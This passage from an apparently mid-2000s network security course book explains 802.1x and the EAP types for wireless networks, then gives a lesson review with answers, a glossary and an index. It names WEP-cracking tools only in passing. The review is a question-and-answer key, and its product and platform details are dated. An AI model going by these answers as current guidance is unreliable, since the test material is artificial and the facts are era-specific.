system is aware of the wireless network in the space.
When the map is complete, you can identify specic nodes in the network. In the
event that you identify an unknown node, you can use this tool to locate that
node. The accuracy is listed within a few feet. You then can simply walk up to
the person using the network with the unidentied node and say hello.
Kismet
Kismet is a powerful wireless network tool, that can perform network sniffing,
log data in a Wireshark format for simple analysis, and can enable you to plot
wireless data and detected networks directly to downloaded maps.
Lesson 9: Securing Wireless Networks 527
Topic 9E
Wireless Trusted Networks
While there have been many advances in securing the wireless networks over
WEP, some of which you have examined in this lesson, there is more work to be
done before an enterprise will trust wireless networking for any critical
application. This is the realm of the 802.11i working group.
802.1x and EAP
802.11i will employ multiple types of security, to allow for exibility in deploy-
ment, and stronger security. When the attacker has one single attack point, such
as WEP, their job is easier. By allowing for different implementations, the job of
attacking 802.11i networks will be much more difficult.
In order to meet the goals of solid wireless security, 802.11i will employ 802.1x
and EAP. 802.1x as the authentication technology that requires mutual authentica-
tion before allowing the client to progress further into the network, called port-
based access control. EAP is the extensible Authentication Protocol that allows
for the use of different authentication solutions, and is currently most well known
for its use in PPP (point-to-point protocol).
You can consider this method of security as built upon three layers. One layer is
the 802.11 physical carrier of the network traffic. On top of the 802.11 physical
carrier, you have the 802.1x authentication system, which can use the various
EAP implementations. Combined, these mechanisms provide for solid wireless
security.
Figure 9-29: The location of EAP 802.1x and the physical 802.11 network.
802.1x allows for port-based
access control and EAP
allows for mutual
authentication.
528 Tactical Perimeter Defense
By implementing this type of security, you have achieved several goals that are
not possible in open wireless networks. These are some of the goals that are met
with this system:
1. Mutual authentication between the client and the authentication server before
network access is granted.
2. User authentication is required, not simple system authentication.
3. Keys are generated dynamically.
4. Strong encryption, with the ability to ensure data integrity.
There is similarity to the WPA security system you examined earlier. A signicant
difference is that to build a wireless PKI, you will need to use and congure digi-
tal certicates. WPA operates by using a shared key, whereas you will not have
that type of manually-input shared key used in a trusted wireless network. There
are enough similarities however, that the nal security implementation based on
the technologies in this lesson will be called WPA-2.
There are three primary components of the trusted wireless network; they are the
end client, the access point, and the authentication server. The authentication
server is commonly a RADIUS server but may be congured to your networks
needs. You may see the client referred to as the supplicant in some text, because
it is technically the software that is involved in the process not the client, and the
software is called the supplicant.
EAP Types
There are four primary EAP types for wireless networking implementation. They
are EAP with Transport Layer Security (EAP-TLS), EAP with Tunneled Transport
Layer Security (EAP-TTLS), Ciscos Lightweight EAP (LEAP), and Protected
EAP (PEAP). Each type has a unique combination of requirements for the client,
authentication server, and delivery of the key.
It is worth noting that there is another type of EAP, called EAP-MD5. Although a
valid EAP type, it is not used in trusted wireless networking. This is because the
authentication of the clients is done by hashing the users password with MD5,
and transmitting the hash. The RADIUS, or whatever authentication server is in
use, checks the MD5 hash for a match and, if there is authentication, is
successful. In a controlled physical network, such as Ethernet, this may have a
place, but in the wireless world, where traffic can be sniffed from the air, this is
not a good system for implementing security. Due to this, you should not imple-
ment security based on EAP-MD5 in your wireless network.
Lightweight EAP (LEAP)
Cisco has led the development of LEAP. LEAP requires a mutual password for
authentication. This password is manually congured on the client and the
authentication server. When the authentication server challenges the client, the
password is returned.
Although this provided good security at a time when the WEP implementation
was cracked, it is not strong enough for a trusted network. This is because of the
reliance on the shared password. A benet of LEAP is that, even though it is not
built into operating systems, Cisco has provided for enough support that imple-
mentation on most platforms is not an issue.
There are ve EAP types, but
EAP-MD5 is not
recommended for wireless
PKI so it is not included as
one of the main EAP types.
Lesson 9: Securing Wireless Networks 529
Since the single shared password exists, there is the possibility to a man-in-the-
middle attack, and the issue of password reuse. LEAP is denitely a step in the
right direction and provides better security than WEP, but it is recommended that
for your wireless PKI you move forward to other systems.
EAP with Transport Layer Security (EAP-TLS)
EAP-TLS is a system that ts into the trusted network as it utilizes X.509 certi-
cates with both the client and the server needing unique certicates. Both sides of
the communication must prove their identity to the other party. There is very little
information that can be sniffed in this system. One of the few things that an
attacker could sniff is the name of the client node. Figure 9-30 shows the steps of
the EAP_TLS process.
Figure 9-30: The process of a client using an EAP-TLS protected network.
In the EAP-TLS example, the client begins the process by associating with the
AP. The AP will block any further access until an accept message is sent from the
authentication server to the AP. The AP responds to the client, essentially telling
the client to send the EAP required initial request, which the AP then forwards on
to the authentication server.
The server receives the request and responds by sending the servers digital cer-
ticate to the client. Once the client validates the information on the servers
certicate, the client responds with the client digital certicate. Once the server
validates the clients certicate, the server begins the process of creating the
mutual key to use. This is done following standards public key cryptography
systems. Once the key is generated, the server sends a message to the AP that
authentication is successful, with the AP then informing the client of the success-
ful authentication. The client proceeds to use the generated key to encrypt traffic
and the AP allows the client access to the LAN.
530 Tactical Perimeter Defense
EAP with Tunneled Transport Layer Security (EAP-
TTLS)
EAP-TTLS takes the fundamental process of EAP-TLS and modies it a bit. The
primary difference between EAP-TLS and EAP-TTLS is that in the EAP-TTLS
system only the server is required to authenticate itself, the client certicate is not
required. This does not mean that the client never has to provide authentication
data; only that it is not required during this initial setup.
Figure 9-31: The process of a client using an EAP-TTLS protected network.
The process begins with the client associating with the AP, and then being
required to begin the EAP-TTLS process. The server sends the server certicate,
which the client validates, and then the client and server build an encrypted
tunnel. This is very similar to how a tunnel is created with SSL.
Once the tunnel is created, the client will present whatever credentials are
required (certicate, token, standard password, and so on), using the algorithm
that the administrator has chosen. In the tunnel, most algorithms will function
without any difficulty, such as PAP, CHAP, MS-CHAP, MS-CHAPv2, EAP-MD5,
and so on.
When the user has successfully authenticated, the server sends the success mes-
sage to the AP, who in turn sends the success message to the client. Now that the
client has successfully gone through this process, messages can be encrypted and
sent to the LAN through the AP.
Protected EAP (PEAP)
PEAP was jointly developed by Microsoft, Cisco, and RSA Security, and com-
bines different existing security mechanisms. There are two parts to the PEAP
process, with the rst being similar to that or EAP-TLS. The second is similar to
EAP-TTLS in that multiple authentication systems are supported.
Lesson 9: Securing Wireless Networks 531
The client begins the process by associating with the AP. The AP will block any
further access until an accept message is sent from the authentication server to
the AP. The AP responds to the client, essentially telling the client to send the
EAP required initial request, which the AP then forwards on to the authentication
server.
The server receives the request and responds by sending the servers digital cer-
ticate to the client. Once the client validates the information on the servers
certicate, the client responds with whatever authentication system is called for.
This may be certicates, tokens, passwords, and so on. Once the server validates
the clients authentication information, the server begins the process of creating
the mutual key to use. This is done following standard public key cryptography
systems. Once the key is generated, the server sends a message to the AP that
authentication is successful, with the AP then informing the client of the success-
ful authentication. The client then proceeds to use the generated key to encrypt
traffic and the AP allows the client access to the LAN.
EAP Type Comparison
Looking at these systems, it may be a bit overwhelming to put them in perspec-
tive and decide what you should implement. Part of your decision may be based
on hardware. For example, if you are running all Cisco networking equipment,
you have the choice of LEAP, EAP-TLS, and EAP-TTLS installed on all their
current adapters. If you are running all Linux nodes, you are limited to EAP-TLS
and EAP-TTLS. On the other hand, only PEAP and EAP-TLS are embedded in
Windows XP, 2000, and 2003.
Type LEAP EAP-TLS EAP-TTLS PEAP
Embedded O/S Clients Cisco WindowsXP/
2003/2000
None WindowsXP/2003/
2000
O/S Clients, when
using third-party
supplicants
All Win32 All Win32, Mac
OS X, Linux,
BSD
All Win32, Mac
OS X, Linux,
BSD
All Win32
Supplicant Vendor None Microsoft, Cisco,
Funk, and others
Microsoft, Funk,
and others
Microsoft, Funk, and
others
RADIUS Support Cisco, Funk,
and others
Cisco, Funk,
Microsoft, others
Funk, and others Cisco, Funk,
Microsoft, and
others
Server Authentication Password
Hash
Public Key
Certicate
Public Key
Certicate
Public Key
Certicate
Client Authentication Password
Hash
Public Key
Certicate
PAP, CHAP, MS-
CHAP, EAP, and
others
Varies as per
implementation.
Dynamic Key Use Yes Yes Yes Yes
Open Standard No Yes Yes Yes
Unique Key per User Yes Yes Yes Yes
Over Security Level Moderate Strongest High High
532 Tactical Perimeter Defense
Wireless Trusted Network Summary
If your enterprise requires a wireless component, you should implement a wire-
less PKI, or else be aware of the high levels of risk. If you already have a PKI
running, the addition of the wireless PKI component is a natural extension. If you
do not have a PKI running, and do not want to implement a full-scale trusted
network, you can implement a PKI just for your wireless network.
The Funk Software company makes a tool called Odyssey that will ll this
purpose. You can run Odyssey on a machine, as your authentication server, and
utilize the security features of PKI on your wireless clients alone. This will
enable you to take advantage of all that wireless networking has to offer, and
have a secure network at the same time.
TASK 9E-1
Choosing a Wireless Trusted Network
1. Consider the following scenario:
You work for a company that is a global enterprise. The company is often
listed in the top 50 companies in the world. You work out of the corporate
office, based in Chicago, IL. There are 300 regional offices, and over 2,000
small satellite offices. In the HQ, there is discussion of conguring a new
wireless network.
This new wireless network is going to be a case study, and if all goes well,
similar systems will be implemented in all the regional offices, and eventu-
ally in the satellite offices. The current discussion is on the security of the
wireless network. For the case study, the implementation will be a single le
server, which local network clients will need to access frequently.
During the case study, there will be approximately 75 users participating (all
of whom are running Windows 2000 or Windows XP), spread throughout
two different oors of the HQ. During the discussion it is agreed quickly
that WEP will not be used, and now the discussion is moving towards the
specic security system to use.
To provide the maximum level of security, which security system will
you recommend for the implementation?
Even though this is a case study, you realize that if successful, the security
system will be duplicated worldwide. Your goal is to provide the maximum
level of security, so your choice is to go with an EAP-TLS implementation.
This will allow for full use of certicates, on both the client and server.
Lesson 9: Securing Wireless Networks 533
Summary
In this lesson, you examined the fundamental issues of wireless networking,
including the required equipment and transmission media of wireless
networks. You then identied WLAN issues such as the function of the AP,
the conguration of SSIDs, and the choices between an ad-hoc and infra-
structure network. You detailed the 802.11 framing and use of multiple
MAC addresses. You then identied the security solutions for the wireless
networks, including WEP, WPA, and WTLS. You examined the tools for
performing security audits, and the methods available for creating a trusted
wireless network using digital certicates.
Lesson Review
9A Which type of spread spectrum signal uses multiple frequencies at the
same time?
Direct Sequence Spread Spectrum (DSSS).
Why is 802.11a incompatible with 802.11b?
They use different spread spectrum techniques.
What are the two primary pieces of equipment for the wireless network
to be operational?
The Access Point and the Wireless Network Interface Card (WNIC).
What language is used to create web content for handheld devices, such
as cell phones, when they connect to the Internet?
WML.
9B What is association?
The process of a WNIC associating with an AP in order to use the wireless
network.
What are the two WLAN topologies?
Ad-hoc mode and infrastructure mode.
What is the name assigned to people who search out WLANs?
War drivers.
9C What additional piece of software is required to congure WPA on Win-
dows 2000 WNIC clients?
Supplicants.
What component of WEP is the cause of its weakness?
The Initialization Vector (IV).
534 Tactical Perimeter Defense
What cipher does WEP utilize?
RC4.
9D What tool used in lesson provides you with a fast scan of the APs in
your area?
NetStumbler.
What tools can be used to break WEP?
Aircrack, AirSnort and WEPCrack.
What tool can provide you with the physical positioning of a wireless
node in the network?
Ekahau.
What tool allows you to perform full wireless packet capture and analy-
sis?
OmniPeek Personal
9E What does 802.1x provide?
Port-based access control.
What does EAP provide?
Authentication.
Why is EAP-MD5 not suitable for trusted wireless networks?
The shared password hash is susceptible to sniffng and other attacks.
Why is EAP-TLS considered the strongest for wireless trusted network
implementation?
Because certicates are required on both the client and the server.
Lesson 9: Securing Wireless Networks 535
536 Tactical Perimeter Defense
attack
An attempt to bypass security controls on a
computer. The attack may alter, release, or
deny data. Whether an attack will succeed
depends on the vulnerability of the com-
puter system and the effectiveness of
existing countermeasures.
audit trail
In computer security systems, a chronologi-
cal record of system resource usage. This
includes user login, le access, other vari-
ous activities, and whether any actual or
attempted security violations occurred.
audit
The independent examination of records
and activities to ensure compliance with
established controls, policy, and operational
procedures, and to recommend any indi-
cated changes in controls, policy, or
procedures.
authentication
To positively verify the identity of a user,
device, or other entity in a computer sys-
tem, often as a prerequisite to allowing
access to resources in a system.
availability
Assuring information and communications
services will be ready for use when
expected.
back door
A hole in the security of a computer sys-
tem deliberately left in place by designers
or maintainers. Synonymous with trap
door; a hidden software or hardware
mechanism used to circumvent security
controls.
breach
The successful defeat of security controls
which could result in a penetration of the
system. A violation of controls of a particu-
lar information system such that
information assets or system components
are unduly exposed.
bug
An unwanted and unintended property of a
program or piece of hardware, especially
one that causes it to malfunction.
compromise
An intrusion into a computer system where
unauthorized disclosure, modication, or
destruction of sensitive information may
have occurred.
confidentiality
Assuring information will be kept secret,
with access limited to appropriate persons.
cryptography
The art of science concerning the prin-
ciples, means, and methods for rendering
plaintext unintelligible and for converting
encrypted messages into intelligible form.
DES
(Data Encryption Standard) Denition 1:
An unclassied crypto algorithm adopted
by the National Bureau of Standards for
public use. Denition 2: A cryptographic
algorithm for the protection of unclassied
data, published in Federal Information Pro-
cessing Standard (FIPS) 46. The DES,
which was approved by the National Insti-
tute of Standards and Technology (NIST),
is intended for public and government use.
false positive
Occurs when the system classies an action
as anomalous (a possible intrusion) when it
is a legitimate action.
firewall
A system or combination of systems that
enforces a boundary between two or more
networks. Gateway that limits access
between networks in accordance with local
security policy. The typical rewall is an
inexpensive micro-based Unix box kept
clean of critical data, with many modems
and public network ports on it, but just one
carefully watched connection back to the
rest of the cluster.
GLOSSARY
Glossary 537
hacker
A person who enjoys exploring the details
of computers and how to stretch their
capabilities. A malicious or inquisitive
meddler who tries to discover information
by poking around. A person who enjoys
learning the details of programming sys-
tems and how to stretch their capabilities,
as opposed to most users who prefer to
learn the necessary minimum.
host
A single computer or workstation; it can be
connected to a network.
host
A single computer or workstation; it can be
connected to a network.
integrity
Assuring information will not be acciden-
tally or maliciously altered or destroyed.
intrusion detection
Pertaining to techniques that attempt to
detect intrusion into a computer or network
by observation of actions, security logs, or
audit data. Detection of break-ins or
attempts either manually or via software
expert systems that operate on logs or other
information available.
intrusion
Any set of actions that attempts to compro-
mise the integrity, condentiality, or
availability of a resource.
key
A symbol or sequence of symbols (or elec-
trical or mechanical correlates of symbols)
applied to text in order to encrypt or
decrypt.
key
A symbol or sequence of symbols (or elec-
trical or mechanical correlates of symbols)
applied to text in order to encrypt or
decrypt.
network security
Protection of networks and their services
from unauthorized modication, destruc-
tion, or disclosure, and provision of
assurance that the network perform its criti-
cal functions correctly and there are no
harmful side effects. Network security
includes providing for data integrity.
network
Two or more machines interconnected for
communications.
network
Two or more machines interconnected for
communications.
AH
(Authentication Header) A eld that imme-
diately follows the IP header in an IP
datagram and provides authentication and
integrity checking for the datagram.
authenticate
To establish the validity of a claimed user
or object.
crash
A sudden, usually drastic failure of a com-
puter system.
cryptography
The art of science concerning the prin-
ciples, means, and methods for rendering
plain text unintelligible and for converting
encrypted messages into intelligible form.
DES
(Data Encryption Standard) Denition 1:
An unclassied crypto algorithm adopted
by the National Bureau of Standards for
public use. Denition 2: A cryptographic
algorithm for the protection of unclassied
data, published in Federal Information Pro-
cessing Standard (FIPS) 46. The DES,
which was approved by the National Insti-
tute of Standards and Technology (NIST),
is intended for public and government use.
GLOSSARY
538 Tactical Perimeter Defense
ESP
(Encapsulating Security Payload) A mecha-
nism to provide condentiality and
integrity protection to IP datagrams.
firewall
A system or combination of systems that
enforces a boundary between two or more
networks. A gateway that limits access
between networks in accordance with local
security policy. The typical rewall is an
inexpensive micro-based UNIX box kept
clean of critical data, with many modems
and public network ports on it, but just one
carefully watched connection back to the
rest of the cluster.
integrity
Assuring information will not be acciden-
tally or maliciously altered or destroyed.
LAN
(Local Area Network) A computer commu-
nication system limited to no more than a
few miles and using high-speed connec-
tions (2 to 100 megabits per second). A
short-haul communication system that con-
nects ADP devices in a building or group
of buildings within a few square kilome-
ters, including workstations, front-end
processors, controllers, and servers.
LAN
(Local Area Network) A computer commu-
nication system limited to no more than a
few miles and using high-speed connec-
tions (2 to 100 megabits per second). A
short-haul communication system that con-
nects ADP devices in a building or group
of buildings within a few square kilome-
ters, including workstations, front-end
processors, controllers, and servers.
metric
A random variable x representing a quanti-
tative measure accumulated over a period.
non-repudiation
Method by which the sender of data is pro-
vided with proof of delivery and the
recipient is assured of the senders identity,
so that neither can later deny having pro-
cessed the data.
OSI
(Open Systems Interconnection) A set of
internationally accepted and openly devel-
oped standards that meet the needs of
network resource administration and inte-
grated network components.
OSI
(Open Systems Interconnection) A set of
internationally accepted and openly devel-
oped standards that meet the needs of
network resource administration and inte-
grated network components.
packet filter
Inspects each packet for user dened con-
tent, such as an IP address, but does not
track the state of sessions. This is one of
the least secure types of rewall.
packet filtering
A feature incorporated into routers and
bridges to limit the ow of information
based on pre-determined communications
such as source, destination, or type of ser-
vice being provided by the network. Packet
lters let the administrator limit protocol-
specic traffic to one network segment,
isolate email domains, and perform many
other functions.
packet sniffer
A device or program that monitors the data
traveling between computers on a network.
packet
A block of data sent over the network
transmitting the identities of the sending
and receiving stations, error-control infor-
mation, and message.
GLOSSARY
Glossary 539
packet
A block of data sent over the network
transmitting the identities of the sending
and receiving stations, error-control infor-
mation, and message.
passive threat
The threat of unauthorized disclosure of
information without changing the state of
the system. A type of threat that involves
the interception, not the alteration, of
information.
penetration
The successful unauthorized access to an
automated system.
perpetrator
The entity from the external environment
that is taken to be the cause of a risk. An
entity in the external environment that per-
forms an attack, i.e. hacker.
physical security
The measures used to provide physical pro-
tection of resources against deliberate and
accidental threats.
plaintext
Unencrypted data.
profile
Patterns of a users activity which can
detect changes in normal routines.
promiscuous mode
Normally an Ethernet interface reads all
address information and accepts follow-on
packets only destined for itself, but when
the interface is in promiscuous mode, it
reads all information (sniffer), regardless of
its destination.
promiscuous mode
Normally, an Ethernet interface reads all
address information and accepts follow-on
packets only destined for itself, but when
the interface is in promiscuous mode, it
reads all information (sniffer), regardless of
its destination.
protocol
Agreed-upon methods of communications
used by computers. A specication that
describes the rules and procedures that
products should follow to perform activities
on a network, such as transmitting data. If
they use the same protocols, products from
different vendors should be able to commu-
nicate on the same network.
proxy
A rewall mechanism that replaces the IP
address of a host on the internal (protected)
network with its own IP address for all
traffic passing through it. A software agent
that acts on behalf of a user, typical prox-
ies accept a connection from a user, make
a decision as to whether or not the user or
client IP address is permitted to use the
proxy, perhaps does additional authentica-
tion, and then completes a connection on
behalf of the user to a remote destination.
router
An interconnection device that is similar to
a bridge but serves packets or frames con-
taining certain protocols. Routers link
LANs at the Network Layer.
router
An interconnection device that is similar to
a bridge, but serves packets or frames con-
taining certain protocols. Routers link
LANs at the network layer.
security audit
A search through a computer system for
security problems and vulnerabilities.
GLOSSARY
540 Tactical Perimeter Defense
security level
The combination of a hierarchical classi-
cation and a set of non-hierarchical
categories that represents the sensitivity of
information.
security policies
The set of laws, rules, and practices that
regulate how an organization manages, pro-
tects, and distributes sensitive information.
security violation
An instance in which a user or other per-
son circumvents or defeats the controls of a
system to obtain unauthorized access to
information contained therein or to the sys-
tem itself.
security
A condition that results from the establish-
ment and maintenance of protective
measures that ensure a state of inviolability
from hostile acts or inuences.
security
A condition that results from the establish-
ment and maintenance of protective
measures that ensure a state of inviolability
from hostile acts or inuences.
server
A system that provides network service
such as disk storage and le transfer, or a
program that provides such a service. A
kind of daemon that performs a service for
the requester, which often runs on a com-
puter other than the client machine.
server
A system that provides network service
such as disk storage and le transfer, or a
program that provides such a service. A
kind of daemon that performs a service for
the requester, which often runs on a com-
puter other than the client machine.
sniffer
A program to capture data across a com-
puter network. Used by hackers to capture
user ID names and passwords. Software
tool that audits and identies network traf-
c packets. Is also used legitimately by
network operations and maintenance per-
sonnel to troubleshoot network problems.
SNMP
(Simple Network Management Protocol)
Software used to control network commu-
nications devices using TCP/IP.
SNMP
(Simple Network Management Protocol)
Software used to control network commu-
nications devices using TCP/IP.
SSH
(Secure Shell) A completely encrypted shell
connection between two machines pro-
tected by a super long pass-phrase.
SYN flood
When the SYN queue is ooded, no new
connection can be opened.
threat
The means through which the ability or
intent of a threat agent to adversely affect
an automated system, facility, or operation
can be manifest. A potential violation of
security.
topology
The map or plan of the network. The
physical topology describes how the wires
or cables are laid out, and the logical or
electrical topology describes how the infor-
mation ows.
traceroute
An operation of sending trace packets for
determining information; traces the route of
UDP packets for the local host to a remote
host. Normally traceroute displays the time
and location of the route taken to reach its
destination.
GLOSSARY
Glossary 541
Trojan Horse
An apparently useful and innocent program
containing additional hidden code which
allows the unauthorized collection, exploi-
tation, falsication, or destruction of data.
vulnerability analysis
Systematic examination of an AIS or prod-
uct to determine the adequacy of security
measures, identify security deciencies,
provide data from which to predict the
effectiveness of proposed security mea-
sures, and conrm the adequacy of such
measures after implementation.
vulnerability
Hardware, rmware, or software ow that
leaves an AIS open for potential
exploitation. A weakness in automated sys-
tem security procedures, administrative
controls, physical layout, internal controls,
and so forth, that could be exploited by a
threat to gain unauthorized access to an
AIS.
GLOSSARY
542 Tactical Perimeter Defense
3DES, 353
802.11 addressing, 478-481
802.11 framing, 476-481
frame details, 476-478
frame format, 476
802.11a standard, 460
802.11b standard, 461
802.11c standard, 461
802.11d standard, 461
802.11e standard, 461
802.11f standard, 461
802.11g standard, 461
802.11h standard, 462
802.11i standard, 462
802.11n standard, 462
802.1x, 512
A
access control, 15
access points, 448-449
Also see: APs
accountability, 377
acknowledgement numbers, 47
ACL
anti-DoS, 142
anti-Land, 143
anti-spoong, 143-144
anti-SYN, 142-143
command syntax, 138-139
creating, 134-135
defending against attacks, 142-144
extended syntax, 139-140
implementing, 138-142
logging, 149-151
operation, 135
activate, 416-418
Active Defense-in-Depth, 7-8
active open connection, 48-50
administrative distance, 123-124
AH, 344
combine with ESP in IPSec, 327-329
conguring, 321-322
Transport mode, 303
Tunnel mode, 303
AH and ESP
in IPSec, 327-329
response policy, 335-336
session analysis, 331-332
Aircrack, 526
AirSnort, 527
alert, 416-418
alert notication, 376
analysis, 382-383, 391
anomaly detection, 373
anti-spoong logging, 150
APs, 448-449
conguration, 482-485
ARP process, 108-110
attack monitoring, 397
attack response, 10
audit data
handling, 25
preserving, 25
audit trails, 25
auditing, 22-23
authentication, 3-5, 16, 98-99, 303, 352-353
Authentication Header, 344
Also see: AH
authentication methods
editing policies, 317-318
authentication tokens, 16-20
authorization, 98-99
authorization and availability, 3-5
awareness, 9
B
banners, 101
basics, 42-43
behavioral use, 379-382
binary conversion, 37-38
Bluetooth, 459
breach, 5-6
broadcast, 44-45
buffered logging, 147-148
bug, 96
business drivers
for a VPN, 338
INDEX
Index 543
C
capture packet data, 411-413
captures
displaying, 54-55
castle analogy, 10-11
CDP, 128-129
centralized host-based design, 384-385
Challenge Handshake Authentication Protocol,
352-353
Also see: CHAP
Challenge Response Process, 17-18
challenge response token, 16-17
CHAP, 352-353
CIDR, 43-44
Cisco
banners, 101-103
logging, 145-146
OS, 96
router language, 96
Cisco Discovery Protocol
See: CDP
Classless Interdomain Routing
See: CIDR
Client policy, 306-307
collection, 382-383
command console, 375
condentiality, 3-5
conguration fragments, 97-98
connection, 48-50
establishing, 48-49
terminating, 49-50
connections
TCP, 63-64
console logging, 147
console password, 99
cryptography, 302
D
DAC, 15
Data Encryption Standard
See: DES
decimal conversion, 37-38
Default Response, 318-321
defense technologies, 13-14
Defense-in-Depth, 6
defensive strategy, 8-10
denial of host, 140-141
denial of network, 141
denial of subnet, 141
DES, 307-308, 353
detection, 371
Direct Sequence Spread Spectrum, 458-459
Also see: DSSS
Discretionary Access Control, 15
Also see: DAC
distance vector routing, 121
distributed host-based design, 386-387
DSSS, 458-459
dynamic, 416-418
dynamic routing, 116-118
E
EAP, 506-507
comparison of types, 532-533
Lightweight, 529-530
Also see: LEAP
Protected, 531-532
Also see: PEAP
types, 529
with Transport Layer Security, 530
Also see: EAP-TLS
with Tunneled Transport Layer Security, 531
Also see: EAP-TTLS
EAP-TLS, 352-353, 530
EAP-TTLS, 531
Ekahau, 527
enable password, 99
Encapsulating Security Payload, 344
Also see: ESP
encryption, 21-22
ESP, 344
combine with AH in IPSec, 327-329
Transport mode, 303
Tunnel mode, 303
Ethereal, 58-59
Extensible Authentication Protocol, 506-507
Also see: EAP
INDEX
544 Tactical Perimeter Defense
Extensible Authentication Protocol-Transaction Level
Security, 352-353
Also see: EAP-TLS
extranet, 338
F
false-negative, 373-375
false-positive, 373-375
FHSS, 458
nger, 131
rewall, 303
Firewall-based VPNs, 339-340
rewalls, 21
Frequency Hopping Spread Spectrum, 458
Also see: FHSS
FTP
capture, 76-78
conguring, 322-323
granting, 142
session analysis, 79
Fundamental Access Point Security, 493-494
H
Hardware-based VPNs, 339-340
hexadecimal conversion, 37-38
host, 33-36
host-based intrusion detection, 384
I
ICMP, 129-130
direct broadcast, 129
session analysis, 76
unreachable, 129-130
ICMP messages, 68-70
IDS, 9, 22, 371
components, 375-376
goals of, 376-377
matrix, 373-375
response, 376
IEEE 802.11 standard, 460-462
independent audit, 24-25
infrared wireless media, 453-454
inside threats
detecting, 396
integrity, 3-5, 65-68
Internet Protocol
See: IP
Internet Security Association Key Management Proto-
col (ISAKMP/Oakley), 345-346
interval analysis, 391
intrusion, 373
intrusion detection, 7-8
denitions, 373
techniques, 378-379
technologies, 378-379
Intrusion Detection, 371-373
Intrusion Detection System, 371
Also see: IDS
Intrusion Detection Systems
See: IDS
IP, 36-39
address classes, 38-39
datagram, 65-68
private addresses, 39
security, 301-302
special-function addresses, 39
IP Policy Agent, 345-346
IP Security Policy and Security Association, 345-346
IP Security Protocol (IPSec), 341
IPSec, 341, 344-346
AH implementation, 312
and NAT, 346-347
components, 345-346
conguring a response, 329-331
conguring options, 333-334
custom policies, 312-317
driver, 345-346
full session, 336-337
implementing, 303-304, 323-324
modes, 302-303
policies, 306-307
Transport Mode, 346
Tunnel Mode, 346
IPSec ESP payload, 351-352
IPSec-enabled operating systems, 340
IPSec-enabled routers and rewalls, 340
INDEX
Index 545
K
key exchange, 344-345
key length, 353
keys, 302
Kismet, 527
L
L2TP, 341, 343, 351-352
LAN, 309-312
LAN-to-LAN routing, 110-111
LAN-to-WAN routing, 112-114
Layer 2 Forwarding Protocol (L2F), 341-342
Layer 2 Tunneling Protocol (L2TP), 341
LEAP, 529-530
link state routing, 122-123
Local Area Network
See: LAN
log, 416-418
log priority, 146
logging, 145-146
ACL, 149-151
anti-spoong, 150
buffered, 147-148
conguring, 147-149
console, 147
syslog, 148-149
terminal, 148
VTY, 150-151
M
MAC, 15
man-in-the-middle attacks, 341-342
management tools, 345-346
Mandatory Access Control, 15
Also see: MAC
MD5, 353
metric, 120-124
Microsoft Management Console
See: MMC
microwave systems
satellite, 455-456
terrestrial, 454
microwave wireless media, 454
misuse, 373
misuse detection, 373
MMC, 304-306
customized conguration, 307
multicast, 44-45
N
NetStumbler, 513-514
network, 33-34
network defense, 2
Network Monitor, 52-58
Display view, 54-55
lters, 55-57
network security
ve key issues, 3-5
network sensor, 375-376
network tap, 376
network-based design, 388
distributed, 389-390
traditional, 388-389
network-based intrusion detection, 387-388
non-repudiation, 3-5
O
OmniPeek Personal, 515-516
captures, 517-520
live captures, 521
Open Systems Interconnection
See: OSI
operating modes, 97
operational audit, 24
OSI model, 34-36
outside threats
detecting, 394-395
P
packet, 34-36
packet lter, 134-135
packet ltering, 9
packet fragmentation, 74-75
PAP, 352-353
pass, 416-418
passive open connection, 48-50
INDEX
546 Tactical Perimeter Defense
passive threat, 5-6
Password Authentication Protocol, 352-353
Also see: PAP
passwords, 22
PEAP, 531-532
perimeter security, 9
PING capture, 76-78
plaintext, 302
Point-to-Point Tunneling Protocol (PPTP), 341
ports, 50-52
PPTP, 341, 342-343, 351-352
pre-congured rules, 425-426
prevention, 371
prole, 393-394
promiscuous mode, 58-59
protocol, 33-36
Q
QoS, 461
R
radio, 457-459
real-time analysis, 391-392
remote access, 338
remove unneeded services, 132-133
Request For Comments
See: RFC
Request-and-Respond
policy, 325-326
session analysis, 326-327
Request-only
session analysis, 324-325
response, 371
RFC, 36
RIP, 124-125
RIPv2, 125-127
routed protocols, 119
router, 42-43
access passwords, 99-100
accessing, 96-97
banners, 101
navigating, 98
user accounts, 100-101
routing, 42-43
process, 114-116
protocols, 119, 120-124
Routing Information Protocol
See: RIP
RSA SecureID token, 18-19
Rule Header, 416-418
Rule Options, 418-419
rule set
testing, 421
ruleset
examples, 419-420
S
SA, 344-345
Secure Server policy, 306-307, 309-312
Secure Shell, 342
Also see: SSH
security, 46-47
Security Association, 344-345
Also see: SA
Security Association API, 345-346
security audit, 24-25
security auditing
basics, 23-24
security policies, 306-307
security protocols, 341
security threats, 5-6
security vulnerabilities, 373
sequence numbers, 47
server, 33-34
Server policy, 306-307
Service Set Identier, 465
Also see: SSID
session teardown process, 64-65
SHA-1, 353
Shiva Password Authentication Protocol, 352-353
Also see: SPAP
Also see: SPAP
Short Message Service, 459-460
Also see: SMS
signature analysis, 392
Simple Network Management Protocol
See: SNMP
site surveys, 512
INDEX
Index 547
small services, 131
SMS, 459-460
SNMP, 96-97
Snort, 404
architecture, 405-406
as a packet sniffer, 410-411
as an IDS, 415
deploying, 404
function, 404-405
installing, 406-408
logging with, 414
Socks v5, 342
software tokens, 19
Software-based VPN applications, 339-340
source routing, 130
spread spectrum technology, 457-458
SSH, 103, 342
client conguration, 106-107
router conguration, 103-106
verication, 105
SSID, 465
static routing, 116-118
statistical analysis, 393-394
subnet mask, 40-42
subnetting, 40-42
surveillance monitoring, 397
syslog logging, 148-149
T
TCP, 46-47
connections, 63-64
ags, 47
headers, 70-72
TCP/IP model, 33-34
Telnet
granting, 141
Temporal Key Integrity Protocol, 506
Also see: TKIP
terminal logging, 148
three-way handshake, 46-47
Time-based Tokens, 18-19
timestamp, 147
TKIP, 506
topology, 121
traceroute, 129-130
training, 9
transit network, 340
Transport mode, 302-303
AH, 303
ESP, 303
Trojan Horse, 50-52
true-negative, 373-375
true-positive, 373-375
tunnel, 340
protocols, 340
Tunnel mode, 302-303
AH, 303
ESP, 303
tunneled data, 340
tunneling protocols, 341
U
UDP, 46-47
UDP headers, 73-74
unicast, 44-45
V
Variable Length Subnet Masking
See: VLSM
VLSM, 43-44
VPN
client, 340
client software, 340
conguring, 354-359
connection, 340
dedicated gateways, 340
design and architecture, 348
elements, 340
gateway, 346-347
implementation challenges, 348-349
security, 350
server, 340
types, 339-340
VPN fundamentals, 337
VPNs
and rewalls, 351-352
VTY logging, 150-151
VTY password, 100
INDEX
548 Tactical Perimeter Defense
